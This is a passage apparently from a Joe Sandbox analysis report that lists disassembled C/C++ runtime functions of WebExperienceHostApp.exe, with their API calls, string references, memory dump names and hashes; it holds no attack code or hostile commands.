Part of subcall function 00007FFE007DBAE0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE007A6043), ref: 00007FFE007DBB00
Part of subcall function 00007FFE007DBAE0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE007A6043), ref: 00007FFE007DBB08
Part of subcall function 00007FFE007DBAE0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE007A6043), ref: 00007FFE007DBB11
Part of subcall function 00007FFE007DBAE0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE007A6043), ref: 00007FFE007DBB2D

_Getdays.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,?,?,?,?,?,00000000,00007FFE007D2EAE), ref: 00007FFE007D1D2F
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00007FFE007D2EAE), ref: 00007FFE007D1D4F
_Getmonths.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,?,?,?,?,?,00000000,00007FFE007D2EAE), ref: 00007FFE007D1D72
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00007FFE007D2EAE), ref: 00007FFE007D1D92

Part of subcall function 00007FFE007A4D10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFE007B2134,?,?,?,00007FFE007A439B,?,?,?,00007FFE007A5AE1), ref: 00007FFE007A4D32
Part of subcall function 00007FFE007A4D10: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFE007B2134,?,?,?,00007FFE007A439B,?,?,?,00007FFE007A5AE1), ref: 00007FFE007A4D58
Part of subcall function 00007FFE007A4D10: memcpy.VCRUNTIME140_APP(?,?,?,00007FFE007B2134,?,?,?,00007FFE007A439B,?,?,?,00007FFE007A5AE1), ref: 00007FFE007A4D70

Strings

:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00007FFE007D1D59
:AM:am:PM:pm, xrefs: 00007FFE007D1DBA
:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December, xrefs: 00007FFE007D1D9C

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: free$GetdaysGetmonths___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funcmallocmemcpy
String ID: :AM:am:PM:pm$:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December$:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
API String ID: 1539549574-35662545
Opcode ID: 098d413dcb5924b6020e165d67e324c57de685152ce5448261965bf7dc3e88b3
Instruction ID: df65ca13eabd5441fd744aac2b41d739abb298508e7da77ff7ba20870ac94615
Opcode Fuzzy Hash: 098d413dcb5924b6020e165d67e324c57de685152ce5448261965bf7dc3e88b3
Instruction Fuzzy Hash: F9313822A0AB4686EB10EF21E8402B977A1FB89F84F498535DB4D5376ADF3CE185C740

Function 00007FFE1A4527DC Relevance: 12.2, APIs: 8, Instructions: 150COMMON

Download Yara Rule

APIs

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A452896
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A4528B5
__AdjustPointer.LIBCMT ref: 00007FFE1A4528F6
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A452903
__AdjustPointer.LIBCMT ref: 00007FFE1A45293F
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A452954
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A452999
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A4529A0

Memory Dump Source

Source File: 00000008.00000002.2073941607.00007FFE1A451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000008.00000002.2073926171.00007FFE1A450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074005137.00007FFE1A461000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074022650.00007FFE1A466000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074040802.00007FFE1A467000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe1a450000_WebExperienceHostApp.jbxd

Similarity

API ID: abort$AdjustPointer
String ID:
API String ID: 1501936508-0
Opcode ID: 74333b6a48d437a1e49e0d4a5d17a7efd967f5fe4f1c704e53a008d29b640736
Instruction ID: 15a733474a3f3b72522dab02b19de84984bff2bd211dd7642612b42545461c7a
Opcode Fuzzy Hash: 74333b6a48d437a1e49e0d4a5d17a7efd967f5fe4f1c704e53a008d29b640736
Instruction Fuzzy Hash: BC5193A1B09F5281FA69AB57944467D63A0AF48FB0F0945FBEA4D077B4DF3CE4618301

Function 00007FFE1A4525F8 Relevance: 12.1, APIs: 8, Instructions: 148COMMON

Download Yara Rule

APIs

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A4526B0
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A4526CE
__AdjustPointer.LIBCMT ref: 00007FFE1A45270F
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A45271C
__AdjustPointer.LIBCMT ref: 00007FFE1A452758
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A45276D
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A4527B2
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A4527B9

Memory Dump Source

Source File: 00000008.00000002.2073941607.00007FFE1A451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000008.00000002.2073926171.00007FFE1A450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074005137.00007FFE1A461000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074022650.00007FFE1A466000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074040802.00007FFE1A467000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe1a450000_WebExperienceHostApp.jbxd

Similarity

API ID: abort$AdjustPointer
String ID:
API String ID: 1501936508-0
Opcode ID: 989c255742605067f4820ea93a2b17caff81b7e2dba0dcbb6734dfe784c1ce87
Instruction ID: 961b8d3ffc331e8f7959891b1e3cfe81354f6e9426cec2765947a756c413d0a2
Opcode Fuzzy Hash: 989c255742605067f4820ea93a2b17caff81b7e2dba0dcbb6734dfe784c1ce87
Instruction Fuzzy Hash: 635192F2B0AE4282EA65FB16D54063862A4AF54FB4F0944F7EA4D077B4DF3CE4628350

Function 00007FF6194975C0 Relevance: 12.1, APIs: 8, Instructions: 100synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,00007FF61949863A), ref: 00007FF6194975E1

Memory Dump Source

Source File: 00000008.00000002.2073734215.00007FF619491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF619490000, based on PE: true

Associated: 00000008.00000002.2073718084.00007FF619490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073752558.00007FF61949A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073773372.00007FF61949E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073792932.00007FF61949F000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff619490000_WebExperienceHostApp.jbxd

Similarity

API ID: ObjectSingleWait
String ID:
API String ID: 24740636-0
Opcode ID: c270f8cfd8f0d8f66238c3edc3ee7643a8d2669a33f0277de5b9c3fb38bf199e
Instruction ID: 78f546fc1b10df9a949f18da3f034cb5ffd1f021790f3b8f50befe9f184e7096
Opcode Fuzzy Hash: c270f8cfd8f0d8f66238c3edc3ee7643a8d2669a33f0277de5b9c3fb38bf199e
Instruction Fuzzy Hash: 24412C31A0CA4282FB60DF65DA1427A6291AF8CFBCF504131E95EC6695DE3CE864CB11

Function 00007FFE1A45678C Relevance: 12.1, APIs: 8, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FFE1A4565F9,?,?,?,?,00007FFE1A45F862,?,?,?,?,?), ref: 00007FFE1A4567AB
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFE1A4565F9,?,?,?,?,00007FFE1A45F862,?,?,?,?,?), ref: 00007FFE1A4567B9
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FFE1A4565F9,?,?,?,?,00007FFE1A45F862,?,?,?,?,?), ref: 00007FFE1A456838

Memory Dump Source

Source File: 00000008.00000002.2073941607.00007FFE1A451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000008.00000002.2073926171.00007FFE1A450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074005137.00007FFE1A461000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074022650.00007FFE1A466000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074040802.00007FFE1A467000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe1a450000_WebExperienceHostApp.jbxd

Similarity

API ID: ErrorLast$Value
String ID:
API String ID: 1883355122-0
Opcode ID: 73257c1383fe11a646b3e382a487d65d8038cd0931d20de145042498fb19a519
Instruction ID: 76bd9b54d5d5df6eefdfd6ef4c68616a2c8f49326606edb3db6b5c0426a7de84
Opcode Fuzzy Hash: 73257c1383fe11a646b3e382a487d65d8038cd0931d20de145042498fb19a519
Instruction Fuzzy Hash: 8E210064F0DF4282EA189B2BA84413562A1AF48FB1B0846F6C97E077F4DF3CA4A59640

Function 00007FFE007DA3E0 Relevance: 10.7, APIs: 7, Instructions: 167COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE007DA764: isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFE007D9BB2), ref: 00007FFE007DA78A
Part of subcall function 00007FFE007DA764: isxdigit.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFE007D9BB2), ref: 00007FFE007DA7F4

_Stoflt.LIBCPMT ref: 00007FFE007DA46B
_Xp_setn.LIBCPMT ref: 00007FFE007DA4A6
_Xp_setn.LIBCPMT ref: 00007FFE007DA4E1
_Xp_addx.LIBCPMT ref: 00007FFE007DA4F4
_Xp_setn.LIBCPMT ref: 00007FFE007DA572
_Xp_setn.LIBCPMT ref: 00007FFE007DA5AD
_Xp_addx.LIBCPMT ref: 00007FFE007DA5C1

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: Xp_setn$Xp_addx$Stofltisspaceisxdigit
String ID:
API String ID: 578106097-0
Opcode ID: 3851c44bb3e18abf273238eade94902fa9b0e404bf02cb7abefa916df54b760b
Instruction ID: 1331f0367cabfc309131a71d919920f599b9daff6b2c57bb2ecdf0bc7a792be3
Opcode Fuzzy Hash: 3851c44bb3e18abf273238eade94902fa9b0e404bf02cb7abefa916df54b760b
Instruction Fuzzy Hash: 2A61E422B1A64292E751EF65E4406BE6730FB94344F584533EF8E137ADDE3CE54A8701

Function 00007FFE007D9B60 Relevance: 10.7, APIs: 7, Instructions: 167COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE007DA764: isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFE007D9BB2), ref: 00007FFE007DA78A
Part of subcall function 00007FFE007DA764: isxdigit.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFE007D9BB2), ref: 00007FFE007DA7F4

_Stoflt.LIBCPMT ref: 00007FFE007D9BEB
_Xp_setn.LIBCPMT ref: 00007FFE007D9C26
_Xp_setn.LIBCPMT ref: 00007FFE007D9C61
_Xp_addx.LIBCPMT ref: 00007FFE007D9C74
_Xp_setn.LIBCPMT ref: 00007FFE007D9CF2
_Xp_setn.LIBCPMT ref: 00007FFE007D9D2D
_Xp_addx.LIBCPMT ref: 00007FFE007D9D41

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: Xp_setn$Xp_addx$Stofltisspaceisxdigit
String ID:
API String ID: 578106097-0
Opcode ID: 7ef03c6b0ac55c9f3de200f3f581fb418e73a4acab4f040e0592480e320118bd
Instruction ID: 8802dd00b1b460a0236e672d6e707801591a1d06b6fbcea102fb2eac435ccaa9
Opcode Fuzzy Hash: 7ef03c6b0ac55c9f3de200f3f581fb418e73a4acab4f040e0592480e320118bd
Instruction Fuzzy Hash: B361C222B1A64292E651FE61E4806FE6731FB95744F584133EF8E137ADDE3CE54A8B00

Function 00007FFE1A45DE8C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 126COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45DF00
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45DF0F

Part of subcall function 00007FFE1A45C0EC: DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C17D
Part of subcall function 00007FFE1A45C0EC: DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C1B6
Part of subcall function 00007FFE1A45C0EC: DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45C4E3

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45DFAF
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45DFBF
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45E06B

Strings

{for , xrefs: 00007FFE1A45DF38

Memory Dump Source

Source File: 00000008.00000002.2073941607.00007FFE1A451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000008.00000002.2073926171.00007FFE1A450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074005137.00007FFE1A461000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074022650.00007FFE1A466000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074040802.00007FFE1A467000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe1a450000_WebExperienceHostApp.jbxd

Similarity

API ID: Name::operator+
String ID: {for
API String ID: 2943138195-864106941
Opcode ID: 4da1d55eb30090646db3391131cdf7cb9f61c82d1a62715605f5e77d0e00937e
Instruction ID: 1f2f5525d1f4dbd2b98019fe9d3a0a6317b7785b5da781016d8284d59d9dbec7
Opcode Fuzzy Hash: 4da1d55eb30090646db3391131cdf7cb9f61c82d1a62715605f5e77d0e00937e
Instruction Fuzzy Hash: FA515DB2B08A81A9EB11EF26D4413F877A1EB45B58F8480F2EA4C07BA5DF7CD565C340

Function 00007FFE007B2F8C Relevance: 10.6, APIs: 7, Instructions: 121threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FFE007B2FBF
GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FFE007B2FDA
GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FFE007B3012
xtime_get.LIBCPMT ref: 00007FFE007B304E
GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FFE007B3075
GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FFE007B30AE
GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FFE007B30F2

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: CurrentThread$xtime_get
String ID:
API String ID: 1104475336-0
Opcode ID: d839657264835679f194a2d385972008e0cfee51125028d57ca34eedcb85d6ac
Instruction ID: 813c28456a41aae2446f4ca3fca09c6a05622b3bf25bcd325951928a42d06927
Opcode Fuzzy Hash: d839657264835679f194a2d385972008e0cfee51125028d57ca34eedcb85d6ac
Instruction Fuzzy Hash: 6A511C32A1AA4696EB60BF19E88437973A1FB44B41F594031DB4E837B9DF3DE985C700

Function 00007FFE007AB8E0 Relevance: 10.6, APIs: 7, Instructions: 110COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140_APP(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FFE007D1D6E), ref: 00007FFE007AB9B0
memset.VCRUNTIME140_APP(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FFE007D1D6E), ref: 00007FFE007AB9C0
memcpy.VCRUNTIME140_APP(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FFE007D1D6E), ref: 00007FFE007AB9D5
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FFE007D1D6E), ref: 00007FFE007ABA09
memcpy.VCRUNTIME140_APP(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FFE007D1D6E), ref: 00007FFE007ABA13
memset.VCRUNTIME140_APP(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FFE007D1D6E), ref: 00007FFE007ABA23
memcpy.VCRUNTIME140_APP(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FFE007D1D6E), ref: 00007FFE007ABA33

Part of subcall function 00007FFE007F2B1C: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFE007A5AA8), ref: 00007FFE007F2B36

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: memcpy$memset$_invalid_parameter_noinfo_noreturnmalloc
String ID:
API String ID: 2538139528-0
Opcode ID: 7b415068a4c640b8c640764b52e96af6a407be4c779bc6c3d2290d0abf82017c
Instruction ID: 87466b44525e14136e693ba72a16cd975d31d90b4b5ec323d77e5438bc763144
Opcode Fuzzy Hash: 7b415068a4c640b8c640764b52e96af6a407be4c779bc6c3d2290d0abf82017c
Instruction Fuzzy Hash: 4D41A562B0AA8191EA04BF56E8442BD6351FB85BD0F5C4532EF5D1BBAEDF7CE1818300

Function 00007FFE007B6010 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 104COMMON

Download Yara Rule

APIs

std::ios_base::failure::failure.LIBCPMT ref: 00007FFE007B60B4
_CxxThrowException.VCRUNTIME140_APP ref: 00007FFE007B60C5
setvbuf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFE007B60FE

Strings

ios_base::failbit set, xrefs: 00007FFE007B6088
ios_base::eofbit set, xrefs: 00007FFE007B608F
ios_base::badbit set, xrefs: 00007FFE007B607D, 00007FFE007B60D0

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: ExceptionThrowsetvbufstd::ios_base::failure::failure
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2924853686-1866435925
Opcode ID: 257351d2f7990be225dd041c9f546b2110cac130ca75bce730c79efb961a91b5
Instruction ID: 3f8618f4987585ad672bafb54d108296dc09eedd896042d45726520b906ce986
Opcode Fuzzy Hash: 257351d2f7990be225dd041c9f546b2110cac130ca75bce730c79efb961a91b5
Instruction Fuzzy Hash: 5341BC72A1AB4A96EB54EF25E4407B833A0FB14B88F484135DB4C4B7A9DF3DE5A4C340

Function 00007FFE007C4640 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 102COMMON

Download Yara Rule

APIs

localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFE007C466E

Part of subcall function 00007FFE007DBAE0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE007A6043), ref: 00007FFE007DBB00
Part of subcall function 00007FFE007DBAE0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE007A6043), ref: 00007FFE007DBB08
Part of subcall function 00007FFE007DBAE0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE007A6043), ref: 00007FFE007DBB11
Part of subcall function 00007FFE007DBAE0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE007A6043), ref: 00007FFE007DBB2D

_Maklocstr.LIBCPMT ref: 00007FFE007C46E7
_Maklocstr.LIBCPMT ref: 00007FFE007C46FD
_Getvals.LIBCPMT ref: 00007FFE007C47A2

Strings

true, xrefs: 00007FFE007C46F6
false, xrefs: 00007FFE007C46E0

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: Maklocstr$Getvals___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funclocaleconv
String ID: false$true
API String ID: 2626534690-2658103896
Opcode ID: 5664b1567b62ae62c0f8fe292401d714ff7bdf959bacf5a14bd7daf587284b16
Instruction ID: 2dfed8f6597c1c0b8c300cb5586b8d800a8c0426a1f8b021690803e4e1debb12
Opcode Fuzzy Hash: 5664b1567b62ae62c0f8fe292401d714ff7bdf959bacf5a14bd7daf587284b16
Instruction Fuzzy Hash: A3414826B19A819AE710DF74E4401ED33B1FB98748B44522AEF4D27B6DEF38D696C340

Function 00007FFE1A45D490 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

APIs

atol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE1A45CB59), ref: 00007FFE1A45D553
DName::DName.LIBVCRUNTIME ref: 00007FFE1A45D572

Strings

void, xrefs: 00007FFE1A45D4D6
`template-parameter, xrefs: 00007FFE1A45D580

Memory Dump Source

Source File: 00000008.00000002.2073941607.00007FFE1A451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000008.00000002.2073926171.00007FFE1A450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074005137.00007FFE1A461000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074022650.00007FFE1A466000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074040802.00007FFE1A467000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe1a450000_WebExperienceHostApp.jbxd

Similarity

API ID: NameName::atol
String ID: `template-parameter$void
API String ID: 2130343216-4057429177
Opcode ID: a4afb4ade66f9edee0c19d8103b502900d10ca38c7d8001433fbf0f12611f871
Instruction ID: e99aec9a9eccae5dcd9b8be1be5c2895e722746dbf15ac5dbd0b5776223ec509
Opcode Fuzzy Hash: a4afb4ade66f9edee0c19d8103b502900d10ca38c7d8001433fbf0f12611f871
Instruction Fuzzy Hash: D1413A62F08F5689FB00DBA6D8502BC23B1BF08BA8F5401B6DE4D17B65DF7C91698340

Function 00007FFE1A45A03C Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45A12F

Strings

short , xrefs: 00007FFE1A45A0BC
int , xrefs: 00007FFE1A45A0AD
unsigned , xrefs: 00007FFE1A45A103
char , xrefs: 00007FFE1A45A0C5
long , xrefs: 00007FFE1A45A09E

Memory Dump Source

Source File: 00000008.00000002.2073941607.00007FFE1A451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000008.00000002.2073926171.00007FFE1A450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074005137.00007FFE1A461000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074022650.00007FFE1A466000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074040802.00007FFE1A467000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe1a450000_WebExperienceHostApp.jbxd

Similarity

API ID: Name::operator+
String ID: char $int $long $short $unsigned
API String ID: 2943138195-3894466517
Opcode ID: f77c1a21e8a5255c030ffbae0acc1ad348c329aa0d52326646e2d78e6bd60f9e
Instruction ID: adabc81d6320643cac276dcd9a61bf6fa616fd46828fbfe6701450c3eaf1706f
Opcode Fuzzy Hash: f77c1a21e8a5255c030ffbae0acc1ad348c329aa0d52326646e2d78e6bd60f9e
